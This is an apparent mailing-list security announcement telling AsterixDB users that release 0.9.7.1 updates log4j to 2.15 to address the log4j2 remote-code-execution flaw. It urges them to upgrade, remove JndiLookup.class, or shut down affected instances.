Hi everyone, Given that AsterixDB extensively uses log4j2 we are consequently affected by the extremely severe RCE 0day vulnerability that has come to light as of late.
Release 0.9.7.1 contains basically only an update to log4j 2.15 to mitigate this issue; otherwise it is identical to 0.9.7. If you are using AsterixDB, even if it is not exposed to the internet, it is absolutely imperative that you either upgrade to 0.9.7.1 or manually patch your log4j2-core JARs to remove JndiLookup.class . This exploit is trivial to perform to AsterixDB, for example simply issuing an HTTP request with the exploit string would cause log4j to ingest it. Furthermore any objects inside datasets that would contain the string could potentially trigger the exploit if given in an erroneous query for example. To reiterate, this vulnerability is as severe as it gets. AsterixDB exposes many simple, insidious and unexpected routes to triggering it. Please upgrade or shut down your instance until you can do so. Thanks, - Ian
